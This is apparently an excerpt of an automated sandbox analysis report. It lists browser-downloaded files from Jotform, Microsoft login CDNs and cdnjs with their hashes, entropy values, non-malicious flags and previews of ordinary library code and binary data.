                                                                                                                                                                                                                                            Preview:wOF2...............L..................................h..w.`....V..s.....t..0...8.6.$..L..P.. .........[yE...O...m...U...b.|.yo...x.~...6...0.~tD...jD..P.7.............."....I.E...|.m.....HD..h-..uuQPz.]J..>.R.UA-k...j.,...[..f{-.........&s....Ht...cWZ....p1..U.c-O..a!2qT.'..V\...BbR.T..+L.or..O.~.=.Rg..'...u.3.p.Q.jz_U..;Q.]..(A.h.k.&<..m...1.p....P=R%U..pC.Id1vGx.I.0.Tg..O..Y.@.C..A..y....,."G..o....G.n......../..0W'.d..........W.I.q1k...B.....A..h....&I.AFj..&...S1A...w....j[..wl.5.{...Y.e.6....T..9.r..FR...yC....x(.i.T.;...^=1.".+z..6.....]M.f.H..9.G..b.l.......:C.$s.v....~D~....J>b....t..#. .."....X+i.....Bq.O....~./.......Q....T.<:+.C1..s..X...T..p.@...mz..w#K.,.........<E...q..1G..=...y..h.,..........R8...7-.3......x......B..%..n.HV..E..E..`.R.......F.6X.o.....[.m.i.P!.Ay..y`...{....y.....$.....w......gxI....|.V.]UM.~Z~....C2@....h.~E.?....dK.Y...\.T.:.tO.&=....@.+.-.b.yp^.ysn>....S..'_e>..>.3.?,._.?..............s....Cpq...A.%9.]..t
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65199)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):624979
                                                                                                                                                                                                                                            Entropy (8bit):5.390107921761244
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:MEdlVbHnCefgao+uJT0IVpJMLUSKh0LSkHCTSuji/Bdpyk4gmTvi2:MyTSa1uXSVSkHCTSDcJ62
                                                                                                                                                                                                                                            MD5:7BF05F15E88CA1A7A9D1060E2FEED54F
                                                                                                                                                                                                                                            SHA1:0323E4D905D6CBF1B24D031AE2D24F0AA36C1889
                                                                                                                                                                                                                                            SHA-256:F9D2EE7B493FF91D5CBDC8CEE03B989C51A27D0DF4993705AFA9E3D9700447F9
                                                                                                                                                                                                                                            SHA-512:7AC98CD876B6FA9B9073CDD9327D8FF0176CACE15A3D092FA88DD2E7EB9CF7C66D321ED5851BD5FF6B7733ACE11D04E06D93D5A37C44DB297426C9D07B6C8E92
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/5241.1f05701c.js
                                                                                                                                                                                                                                            Preview:/*! For license information please see 5241.1f05701c.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2acd20d3-1b12-5ce4-947c-4c81a5a1edd0")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["5241"],{34766:function(e){e.exports=function(){"use strict";function e(e){var t=new d,r=Array.from(e);if(!r.every((function(e){return!Number.isNaN(e)})))throw TypeError('CSSMatrix: "'+e+'" must only have numbers.');if(16===r.length){var n=r[0],a=r[1],i=r[2],o=r[3],s=r[4],l=r[5],u=r[6],c=r[7],f=r[8],h=r[9],p=r[10],v=r[11],y=r[12],m=r[13],g=r[14],b=r[15];t.m11=n,t.a=n,t.m21=s,t.c=s,t.m31=f,t.m41=y,t.e=y,t.m12=a,t.b=a,t.m22=l,t.d=l,t.m32=h,t.m42=m,t.f=m,t.m13=i,t.m23=u,t.m33=p,t.m43=g,t.m14=o,t.m24=c,t.m34=v,t.m44=b}else{if(6!==r.length)throw new TypeE
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):77901
                                                                                                                                                                                                                                            Entropy (8bit):5.375949240962371
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:i4WEyahgVvZiA2t1CJ6VFEQ0PReipB6w0clRgNp2:7EtqI6RGRRpRgr2
                                                                                                                                                                                                                                            MD5:9CFC1B51E86FF2B286D08C07BEABCEAB
                                                                                                                                                                                                                                            SHA1:7F45BFE5E022059BD2B5B881ABE2336C2D070A0C
                                                                                                                                                                                                                                            SHA-256:E097329E1D8DCBC91580722928D682A24EFBF1C3F2F2C90482C5D0D0FFF2F019
                                                                                                                                                                                                                                            SHA-512:0702AF1CDA53858C2F4E198000268F20815DA981D985B3529C5294349849601D92D92EA896E90F42B8D355E6C7C6AD99808159053A68B269BBA64C56A43F1883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/umd/674ac14411e/for-push-notification.js
                                                                                                                                                                                                                                            Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-push-notification"]=t():e["for-push-notification"]=t()}(this,function(){return function(){var e={52312:function(e,t,r){var n=r(83743)(r(92373),"DataView");e.exports=n},23715:function(e,t,r){var n=r(56037),o=r(37609),i=r(29391),s=r(94191),a=r(42721);function u(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}u.prototype.clear=n,u.prototype.delete=o,u.prototype.get=i,u.prototype.has=s,u.prototype.set=a,e.exports=u},56629:function(e,t,r){var n=r(1171),o=r(67838),i=r(44859),s=r(4073),a=r(28541);function u(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}u.prototype.clear=n,u.prototype.delete=o,u.prototype.get=i,u.prototype.has=s,u.prototype.set=a,e.exports=u},91739:function(e,t,r){var n=r(83743)(r(92373),"Map");e.exports=n},10503:function(
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):35170
                                                                                                                                                                                                                                            Entropy (8bit):7.993096534744333
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                                                                                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                                                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                                                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                                                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32811
                                                                                                                                                                                                                                            Entropy (8bit):7.992877953733209
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                                                                                                                                                                            MD5:2E287EB418940084B921590C6E672C9E
                                                                                                                                                                                                                                            SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                                                                                                                                                                            SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                                                                                                                                                                            SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):444513
                                                                                                                                                                                                                                            Entropy (8bit):5.372989739859773
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:k8Gou+HIkJSHGrJtIOMXUtLFg3sl9y5JRZ+lnnucUSRDZvRHoN0gQWpH8Yx1C7YX:Tl9yFZ+lnnucUSRDZvRHoN0gQWpH8Yxp
                                                                                                                                                                                                                                            MD5:7699BC9A56265F4D22141F4C413B8486
                                                                                                                                                                                                                                            SHA1:310E869CBEE94DD85F94E108416C771109267FAD
                                                                                                                                                                                                                                            SHA-256:F2917735A26CE822DD83FB8CAA3517AAF836B07B799E4F3D6DF04C60EBDBB9F0
                                                                                                                                                                                                                                            SHA-512:ECA38B7A4D685CF0A2F8645FC094E80611E37C8DE0E7662C4AA4634F8422A0706617B0B8F10E50EF7E3393933035E99A11DB1183EFCA9ACF4E8361A51A8BC166
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn02.jotfor.ms/s/portal/674ac14411e/static/css/index.5048e680.css
                                                                                                                                                                                                                                            Preview:.jfErrorPage{height:100%}.jfErrorPage-wrapper{z-index:100;background-color:#f5f5f5;width:100%;height:100%;position:absolute}.jfErrorPage-container{justify-content:center;align-items:center;width:100%;min-height:100%;padding:80px 0;display:flex}.jfErrorPage-content{color:#0a1551;background:#fff;border-radius:4px;flex-direction:column;flex:none;justify-content:center;align-items:center;width:100%;max-width:600px;padding:60px 80px;display:flex;box-shadow:0 4px 4px rgba(0,0,0,.25)}.jfErrorPage-header{background-color:#0a1551;width:100%;padding:18px 20px 22px;position:absolute}.jfErrorPage-logo{height:30px}.jfErrorPage-icon-container{color:#ffb629;background-color:rgba(255,182,41,.25);border-radius:100%;width:96px;height:96px;padding:1px 8px 15px}.jfErrorPage-title{margin-top:16px;font-size:32px;font-weight:700}.jfErrorPage-highlight{text-align:center;margin-top:12px;font-size:17px;font-weight:400}.jfErrorPage-action{cursor:pointer;color:#fff;background-color:#09f;border:none;border-radius:
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15845)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16274
                                                                                                                                                                                                                                            Entropy (8bit):5.366931692196057
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:oa3h998pqfjGjGIw9UveiFgeDNx8fz103eBsf:oKmw9Ungepxynsf
                                                                                                                                                                                                                                            MD5:D51F0731454569BC55A8E97325173207
                                                                                                                                                                                                                                            SHA1:9FF5CA189929176E99418FA78FD12E559C27EF8F
                                                                                                                                                                                                                                            SHA-256:A355A9F72BC3B79252611F14CCFA579B116E41C9198BD43B4AF97D3F3AAC7CC5
                                                                                                                                                                                                                                            SHA-512:87081711FB2F380D617B359C345E769B850990AC7E8CA25A64A0446CA74210EE8078EC5AF13147D8B07F06F63FE0D9BBFEA548D2CEF17FA84592457D60F7FE48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/*! For license information please see 7988.f937c1ff.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ec33327f-e33f-5d63-9d27-7c27340c3a43")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7988"],{1625:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map((function(e){return t[e]})).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach((function(e){r[e]=e})),"abcdefghijklmnopqrst"===Object.keys
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10521)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10892
                                                                                                                                                                                                                                            Entropy (8bit):5.220052012475609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:WTDUvhlrY+kkzNJHdPphtyYZcr5PTVVPnuHUzb0d3hC:qUvhm+VlPphkkKVVPnfzwd3hC
                                                                                                                                                                                                                                            MD5:EF7D0DAF7C7D4A4DEBBC94603BE8497A
                                                                                                                                                                                                                                            SHA1:22B9BA8FD096241CB04DEF04691C312B77EFA34E
                                                                                                                                                                                                                                            SHA-256:DA7282E363D0D6F1276C27096833E904EFAFBC72E8E90AE75C46EEED997F1DE1
                                                                                                                                                                                                                                            SHA-512:9A3739417A7B266522C4FD3B26E415DFEBD3F707BA9D28F76B471A17FA5AE2B60FB91B2A9ECA82DB555B1D74F3712F5E84D0A0BFE10AF2E613DE8FE72D6EF1DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2f0969ff-0b04-510a-8ae3-6687ebde5179")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["5083"],{11577:function(t,e,r){r.d(e,{t7:function(){return y},S_:function(){return M}});var n=r("90946"),o=r("62568"),i=r("1589"),a=function(t,e){return t===e};var l=function(t){var e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:a,r=void 0,n=[],o=void 0,i=!1,l=function(t,r){return e(t,n[r])};return function(){for(var e=arguments.length,a=Array(e),s=0;s<e;s++)a[s]=arguments[s];return i&&r===this&&a.length===n.length&&a.every(l)?o:(i=!0,r=this,n=a,o=t.apply(this,a))}},s=r("37897"),c="object"==typeof performance&&"function"==typeof performance.now?function(){return performance.now()}:function(){retur
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 386 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20775
                                                                                                                                                                                                                                            Entropy (8bit):7.966736106439244
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:KsBopDvLrAvNnqfkSx7GWQUViDP1LK8wkPWA67iUZZiwiKNXsRBaPH5BN87wL4WU:fXv2kSBnQUVQL/wkjOiUZZiwiWYI6IG
                                                                                                                                                                                                                                            MD5:E1F8E411137B59501B3240C5DB9AEAEB
                                                                                                                                                                                                                                            SHA1:0A5E09AFCA2CFDBD29F2D13F48BB78E1F375DF4A
                                                                                                                                                                                                                                            SHA-256:4269765C20D9014CF24C8CFC41B6EE3F08BD8B276366AB946F86B2C76BA0F466
                                                                                                                                                                                                                                            SHA-512:21FE4E7CD8CC1E3C2DA66D7037FA5D9F0C6D1A377EE04DCEC8253E9C5F1B532163882912917F7BE3A8F20BD3A0F8E6AD6C58C09F152CA6FFF5AA8B2776133C09
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......`.......u.....iCCPICC Profile..H....TS.....@....N.)!.P..`#$..!.@P.;.C.QD...A..G..X.`...v.D..q.`C.]`.f...z{...e.}...s../..M.D"...H.gI....1.q... ........L.+44. 6..n.z.\.nYN........L..P(...L^....'.f..:....fI&...*R.A..Mp......IF.'s"...3....\i..d.$...%!u..k...b.s.vOKK.#|.a.$G..D}f._.$..f..&..$.L..[.).q.....-M$......d.....=KM...8a^.4......,.f^&;n.3E.i.s...uD.9Q.+..fq".Y...>...0...R6k....d...x..#.....=...y..R..gr..T.&_.@..53..|..2..v!G.nVr..|..3......1....o...Hy.$.K>.D.*........p..Y..y7T..)..i.l..D....B.y..%X.5..v.d.T....`!.M...yV..[k[{.&....xG......L,......}).....p|...~31.Q.(.....d...z....@...u...........O...@....`1..d..t... ...M`+..;......G@+8....*........`.|.c... .D..!...2.l!&...@AP....CI...A..z..*....P=..t.:.]....P.4.....(....Z..<.f.,8.....Ip..........>...g.....~........tQ.(&...A..QR.*T!..U.jD..:Q.P..W..h,..f.-.h.t$...@.B......-...[.>...;....c\0.L.&.....)..a.1.0w0...X,..5.:a.......l1v;..{.....p8u.9......p..J.A.i.M..........}.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):3620
                                                                                                                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (11971)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11972
                                                                                                                                                                                                                                            Entropy (8bit):5.24652740231673
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:jSeMIoYOvYHOEfRKTwbvYf8TW1F6bv4vC1267wDYFPSU/SNHpp9eaaXwb/:DnZRn7YkTaFey6PFr+Hpp9ePXwb/
                                                                                                                                                                                                                                            MD5:B308A09E3BDEBF4FFF2CFF7B77CCDC7A
                                                                                                                                                                                                                                            SHA1:D0249AE74E1E7A75422C37830FBCB072C44D0684
                                                                                                                                                                                                                                            SHA-256:50A653379E5FAE866A0BB4AB00A387F74AC1B1B7CFBB9F9CBFA797419E134DF6
                                                                                                                                                                                                                                            SHA-512:50098CE42175351C3CD9F045C84C9DE6E8BBB363F46698D26E0B51B874F1EB4BB5A2EF880418C0C697E5E3C85E5336BEA4DD8EACF443DC016BDF9A1EE42BFA45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:var JotFormActions=function(){"use strict";function o(n,r){return function(){for(var e=new Array(arguments.length),t=0;t<e.length;t++)e[t]=arguments[t];return n.apply(r,e)}}var t=Object.prototype.toString;function a(e){return"[object Array]"===t.call(e)}function n(e){return null!==e&&"object"==typeof e}function r(e){return"[object Function]"===t.call(e)}function i(e,t){if(null!=e)if("object"!=typeof e&&(e=[e]),a(e))for(var n=0,r=e.length;n<r;n++)t.call(null,e[n],n,e);else for(var o in e)Object.prototype.hasOwnProperty.call(e,o)&&t.call(null,e[o],o,e)}var d={isArray:a,isArrayBuffer:function(e){return"[object ArrayBuffer]"===t.call(e)},isBuffer:function(e){return null!=e&&null!=e.constructor&&"function"==typeof e.constructor.isBuffer&&e.constructor.isBuffer(e)},isFormData:function(e){return"undefined"!=typeof FormData&&e instanceof FormData},isArrayBufferView:function(e){return e="undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&e.buffer instanceof Ar
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                            Encrypted:false
